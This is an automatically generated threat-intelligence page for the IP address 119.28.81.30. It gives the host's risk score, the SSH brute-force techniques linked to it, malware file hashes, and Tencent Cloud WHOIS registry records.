119.28.81.30 Threat Intelligence and Host Information

Share on:
Mar 02, 2024 ipinfopage

General

This page contains threat intelligence information for the IPv4 address 119.28.81.30 and was generated either as a result of observed malicious activity or as an information gathering exercise to assist with enrichment of security events and context. All information is gathered passively through aggregation of public sources, or observations through activity upon honeynets. The host score is calculated through a series of statistically weighted values and machine learning which takes into account metadata such as host information, frequency, volume and global distribution of malicious activity, association with other known malicious hosts or networks, proxying or anonymising behaviour such as with tor exit nodes, residential proxies or VPN services, and many other attributes. These values are historical and indicative only - and should not be taken to be an accurate representation of the users, businesses or networks in which they reside.

Likely Malicious Host 🟠 60/100

Host and Network Information

  • Mitre ATT&CK IDs: T1078 - Valid Accounts, T1083 - File and Directory Discovery, T1098.004 - SSH Authorized Keys, T1105 - Ingress Tool Transfer, T1110.004 - Credential Stuffing, T1110 - Brute Force

  • Tags: Bruteforce, cowrie, cyber security, digital ocean, ioc, malicious, Nextray, phishing, scanners, ssh, tsec

  • View other sources: Spamhaus VirusTotal

  • Country: Hong Kong
  • Network: AS132203 tencent building kejizhongyi avenue
  • Noticed: 34 times
  • Protocols Attacked: ssh
  • Countries Attacked: Canada, Czechia, Denmark, Estonia, France, Germany, Latvia, Lithuania, Norway, Poland, Romania, Turkey, Ukraine, United Kingdom of Great Britain and Northern Ireland, United States of America

Malware Detected on Host

Count: 18 c0bf43b660fb91f4bec9c459ff0f4b1a7c999613be53ccc151d363e0c882f017 d1b3709be43be86ad8c7ba20b816ffa27dbebccaa14f4062e7b57124839865e6 0581c0dcd7afe56f26f705d1692a7188a0be70311122c19a77dd1ae5906e0c45 314b6b947e3cc210a8d5a82e59f873150ca12855877654c2b42a5b0c9561c951 9ce5462e127bf97dbe1f81dd044bb36b01725731ffa56a6b6b64c399b3d88773 9f6671fc8b1512d98dba37837a901fc1684bbc18f71e358b72e40b36d8c65d7f 699837110d20c0a927fba2ac970a66634875316d54499da3cc8b08a4cd8f7314 72de47d2af8ec94b67735ed57f3507c4d6bdba9bb1392f8491d6e00feec4703c 11e2ba3e18fb8986e734d87ee60d1c353896d29470d36d812597a9c98f5e7f83 b280accf0a2d19e1a272bc2b08e00cd0c8a40a18fe80f178d02c7c55aae3adb8

Map

Whois Information

  • inetnum: 119.28.0.0 - 119.29.255.255
  • netname: TencentCloud
  • descr: Tencent cloud computing (Beijing) Co., Ltd.
  • descr: Floor 6, Yinke Building,38 Haidian St,
  • descr: Haidian District Beijing
  • country: HK
  • admin-c: JT1125-AP
  • tech-c: JX1747-AP
  • abuse-c: AC1601-AP
  • status: ALLOCATED PORTABLE
  • mnt-by: MAINT-CNNIC-AP
  • mnt-irt: IRT-TENCENTCLOUD-CN
  • mnt-routes: MAINT-TENCENT-NET-AP-CN
  • last-modified: 2023-11-28T00:56:59Z
  • irt: IRT-TencentCloud-CN
  • address: 9F, FIYTA Building, Gaoxinnanyi Road, Southern
  • address: District of Hi-tech Park, Shenzhen
  • e-mail: [email protected]
  • abuse-mailbox: [email protected]
  • admin-c: JT1125-AP
  • tech-c: JX1747-AP
  • mnt-by: MAINT-CNNIC-AP
  • last-modified: 2023-03-16T07:10:54Z
  • role: ABUSE CNNICCN
  • address: Beijing, China
  • country: ZZ
  • phone: +000000000
  • e-mail: [email protected]
  • admin-c: IP50-AP
  • tech-c: IP50-AP
  • nic-hdl: AC1601-AP
  • abuse-mailbox: [email protected]
  • mnt-by: APNIC-ABUSE
  • last-modified: 2020-05-14T11:19:01Z
  • person: James Tian
  • address: 9F, FIYTA Building, Gaoxinnanyi Road,Southern
  • address: District of Hi-tech Park, Shenzhen
  • country: CN
  • phone: +86-755-86013388-84952
  • e-mail: [email protected]
  • nic-hdl: JT1125-AP
  • mnt-by: MAINT-CNNIC-AP
  • last-modified: 2021-09-17T00:37:15Z
  • person: Jimmy Xiao
  • address: 9F, FIYTA Building, Gaoxinnanyi Road,Southern
  • address: District of Hi-tech Park, Shenzhen
  • country: CN
  • phone: +86-755-86013388-80224
  • e-mail: [email protected]
  • nic-hdl: JX1747-AP
  • mnt-by: MAINT-CNNIC-AP
  • last-modified: 2021-09-17T00:38:09Z
  • route: 119.28.64.0/19
  • descr: ComsenzNet routes
  • origin: AS133478
  • mnt-by: MAINT-COMSENZ1-CN
  • last-modified: 2015-12-14T12:36:14Z

Links to attack logs

bruteforce-ip-list-2022-07-20 ** dofrank-ssh-bruteforce-ip-list-2022-07-17 ** **